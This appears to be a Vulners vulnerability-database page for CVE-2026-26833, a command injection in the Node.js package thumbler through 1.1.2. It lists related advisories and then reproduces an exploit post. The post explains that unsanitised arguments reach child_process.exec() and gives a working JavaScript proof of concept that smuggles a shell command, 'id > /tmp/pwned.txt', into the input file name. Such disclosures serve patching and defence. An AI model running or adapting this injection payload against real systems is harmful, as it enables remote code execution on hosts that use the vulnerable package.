| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for CVE-2026-26833 | 24 Mar 202616:15 | – | githubexploit | |
| Thumbler 安全漏洞 | 25 Mar 202600:00 | – | cnnvd | |
| CVE-2026-26833 | 25 Mar 202600:00 | – | cve | |
| CVE-2026-26833 | 25 Mar 202600:00 | – | cvelist | |
| EUVD-2026-15463 | 25 Mar 202618:31 | – | euvd | |
| thumbler allows OS Command Injection | 25 Mar 202618:31 | – | github | |
| CVE-2026-26833 | 25 Mar 202616:16 | – | nvd | |
| GHSA-MVHF-547C-H55R thumbler allows OS Command Injection | 25 Mar 202618:31 | – | osv | |
| 📄 thumbler 1.1.2 Command Injection | 26 Mar 202600:00 | – | packetstorm | |
| PT-2026-27802 | 25 Mar 202600:00 | – | ptsecurity |
==================================================================================================================================
| # Title : thumbler ≤ 1.1.2 Command Injection in thumbnail() Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/mmahrous/thumbler |
==================================================================================================================================
[+] Summary : The thumbler package (through version 1.1.2) contains a critical command injection vulnerability in the thumbnail() function.
User-supplied input parameters (input, output, time, size) are concatenated into a single ffmpeg command string and executed via child_process.exec() without proper sanitization.
An attacker can inject arbitrary shell commands by crafting malicious input, leading to remote code execution (RCE) on the host system with the privileges of the Node.js process.
[+] POC :
// exploit.js
const thumbler = require("thumbler");
const maliciousCommand = "id > /tmp/pwned.txt";
const maliciousInput = `test.mp4"; ${maliciousCommand}; echo "`;
const outputPath = "/tmp/output.jpg";
const options = {
time: 5,
size: "100x100"
};
console.log("[+] Executing command injection via thumbler CVE-2026-26833");
console.log("[+] Malicious input:", maliciousInput);
thumbler.thumbnail(maliciousInput, outputPath, options, (err, stdout, stderr) => {
if (err) {
console.log("[!] Thumbnail generation failed (but command may have executed)");
console.log("Error:", err.message);
} else {
console.log("[+] Thumbnail generated (injection might still work)");
}
console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation